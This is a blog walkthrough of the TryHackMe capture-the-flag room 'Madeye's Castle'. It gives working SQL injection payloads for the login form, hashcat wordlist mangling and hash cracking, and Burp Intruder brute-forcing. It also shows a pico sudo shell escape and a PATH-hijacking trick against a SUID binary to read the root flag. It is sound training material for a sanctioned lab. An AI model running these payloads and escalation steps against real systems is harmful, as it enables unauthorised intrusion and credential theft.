TryHackMe: Madeyes Castle writeup/walkthrough

Writeup/tutorial for the room ‘Madeye’s Castle’ on TryHackMe

Room Link | Medium difficulty

As per THM rules, write-ups shouldn’t include passwords/cracked hashes/flags. I can only help you find out how to get the answer, not give you the answer.

Deploy the machine and in the meantime, connect to the THM network:

sudo openvpn --config <your_vpn_file>

Task 1: Capture the flags

nmap -A <Machine_IP>
nmap results show that there is ssh on port 22, a webserver on port 80 and smb on ports 139 and 445

The nmap result had smb so we can try smbclient on the IP.

smbclient -N //<Machine_IP>//sambashare
ls
get .notes.txt
get spellnames.txt

Reading through the notes gave me 2 hints that the owner of the file is not using rockyou.txt, but maybe spellnames.txt
The other hint is that Hermonine (Yep, that’s what the spelling was) loves using a historical text editor.

Going to the http://<Machine_IP>:80 shows us the Apache2 Ubuntu default page but if we view it’s source, we can see that it is using virtual hosting on hogwartz-castle.thm

Let’s add the IP and virtual hosting address to /etc/hosts file to see if we can get a webpage.

sudo nano /etc/hosts
# Append the below as shown in picture
<Machine_IP> hogwartz-castle.thm
10.10.121.218 was the IP for the machine in my room. You should check the IP in the TryHackMe room

If you go to hogwartz-castle.thm in your browser (Click yes on the prompt bar that shows up to take you to http://hogwartz-castle.thm), you’ll see a login page.

Let’s try SQL injection by entering ‘ or 1=1 ;-- - in the username field and anything for password.

It says the following:
“The password for Lucas Washington is incorrect! contact administrator. Congrats on SQL injection… keep digging”

We have a potential username that we could use

Sqlmap was able to get me a table name and the database name but it wasn’t able to dump column values.

users table and SQLite database

I moved to burp suite and tried to get the answers manually. I captured the request in burp suite and sent it to repeater.

I right clicked on the text area and chose the ‘Copy to file’ option from the drop down menu

I sent the request to repeater and tried some SQL injection. If you enter just an apostrophe in the username field, it will say internal error but if you add a comment the ‘-- - it will only say that username or password is incorrect so our SQL injection is working. Credit to Musyoka Ian as his writeup was really helpful.

I tried adding the following and it gave me a 500 internal error:

user='+union+select+1--+-&password=a

I kept on adding more numbers and was able to get a 403 error using the following:

user='+union+select+sql,2,3,4--+-&password=a

If you see the right image above, it says 1 in the middle and 4 at the end. I added a string in place of 1 and it printed the string:

user='+union+select+'testing',2,3,4--+-

Now I can try checking the SQL version using(Source):

user='+union+select+sqlite_version(),2,3,4--+-&password=a
We can see that SQLite version is 3.22.0

To enumerate further, I used the following:

user='+union+select+group_concat(tbl_name),2,3,4+FROM+sqlite_master+WHERE+type='table'+and+tbl_name+NOT+like+'sqlite_%'--+-&password=a
This confirms that a table named users exists from our sqlmap enumeration

I tried password as the table name for this db:

user='+union+select+group_concat(password),2,3,4+FROM+users--+-&password=a
content for the password table

Using a wordlist, I was able to do a bruteforce attack to find other tables.

The top images show the burp suite bruteforce settings. The bottom images show the 2 other tables content found using this attack.

I used sublime’s text editor to remove extra text and find all instances of commas in the names files and created a wordlist out of it.

After going through the notes.txt file, there was nothing interesting like repeating sentences but there was 1 thing that gave a clue columns where someone said their password used best64. best64 is a rule in hashcat and john. We can use this rule for word mangling with hashcat to get some passwords from the hashes I just extracted. Earlier in our smb enumeration, I was able to recover a .notes.txt and a wordlist containing spells, so maybe we can create use that wordlist with the best64 rule.

In my passwords file, I used sublime’s find all features to get select all commas and just pressed enter so each hash was on a new line. I copied one of the hashes and used haiti to identify the type of hash. The same can be done with hash-identifier and they both said SHA-512.

Using haiti, I found that the hashes were SHA-512 and confirmed it with hash-identifier

I created a wordlist using the best64 rule with hashcat.

cp /usr/share/hashcat/rules/best64.rule ./hashcat --stdout -r /usr/share/hashcat/rules/best64.rule spellnames.txt > wordlist.txt

Using a GTX 1050 4gb and the wordlist I just created with hashcat, I was able to crack the hash instantly.

hashcat -m 1700 madeye-castle-hashes.txt wordlist.txt 

We now have 1 password but a lot of usernames so I started bruteforce attack using Intruder in Burp suite to find the username that matches this password. I sent my captured login POST request to intruder, copied the names from the file I removed spaces from and pasted them into burp suite and highlighted the username area and entered the password.

Add the password we just cracked with hashcat highlight the area for user

The attack showed that Harry Turner had the greatest response length but when checking the response, it said something about redirecting so I tried logging in manually with Harry Turner and the password we got.

It worked and it said the following:
The password for Harry Turner is incorrect! My linux username is my first name, and password uses best64

#1. User1.txt and User2.txt

Earlier in the nmap scan, we found an open ssh port so let’s try logging in there. I tried ssh with Harry as the user but it didn’t work so I tried it with harry(lowercase h) and it logged me in.

ssh harry@<Machine_IP>
<Enter harry's password>
ls
cat user1.txt
sudo -l
user1.txt flag and allowed commands as user harry by invoking another user, hermonine

Going to gtfobins, I was able to find the command to use for pico to elevate to hermonine’s privilege. Pico is a text editor and I believe the notes.txt in smb enumeration was hinting towards this editor.

sudo -u hermonine /usr/bin/pico
# Press Enter
# Press Ctrl+R
# Press Ctrl+X and then Enter the following commands:
reset; sh 1>&0 2>&0
bash
clear
# After getting a shell with hermonine's privilege, we are currently in harry's directory and we need to go to hermonine's directory and get the user2.txt flag.cd ../hermonine
ls
cat user2.txt

#3. Root.txt

I used the find command to find other SUID’s that I could use to elevate privileges and the first one that stood out from the rest was called /srv/time-turner/swagger and the hint for root.txt mentioned you have to trick time so it would be a good guess that this has something to do with gaining root.

find / -perm -u=s -type f 2>/dev/null

If you run the swagger file, it asks for a number and you can almost never get it right. If you keep on running the file, it gives different results but if you send the output number of one as the next input, you get it correct!

# There is a space after of in the 'of ' (awk -F 'of ' '{print $2}')
echo '123' | /srv/time-turner/swagger | grep ‘of’ | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger
The binary is running uname -p when we input the correct number

The above command sends a number to the swagger binary and then greps ‘of’ so that we only have the last line (I tried other words but they were in both lines so only ‘of’ worked). I separated the text and the number using awk and selected the number and sent that back into the binary using a pipe. The answer it gives is of the command uname -p so we can make a malicious uname file and try to get a shell with root privileges and add the folder to the start of the PATH variable so it runs our malicious binary first. I tried adding ‘sudo -u root /bin/bash’ into the malicious uname binary but it didn’t work so I tried to get it to print the flag directly instead of getting root shell.

cd /tmp
echo ‘cat /root/root.txt’ > uname
chmod 777 uname
ls -la | grep uname
export PATH=/tmp:$PATH
echo $PATH
echo '123' | /srv/time-turner/swagger | grep 'of' | awk -F 'of ' '{print $2}' | /srv/time-turner/swagger

I would appreciate some claps and leave any responses if you have any questions. Follow me for more write-ups!

--

--

--

I like all things IT but currently focused on being an IT Security Specialist.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Update your Product Documents

Wonderland TIME — Migration and Changes

The Best Locking Pliers for any Job

Implement with C

GOJEK Engineering Bootcamp (Part 1)

A New Age of Learning

Will You Accept My Pull Request?

What we learned from 100,000 game bugs reported?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Phantom_95

Phantom_95

I like all things IT but currently focused on being an IT Security Specialist.

More from Medium

Writeup — ‘Kill L’

Screenshot — 1

Agent Sudo — TryHackMe Walkthrough

TryHackMe | Road

Tryhackme Archangel Writeup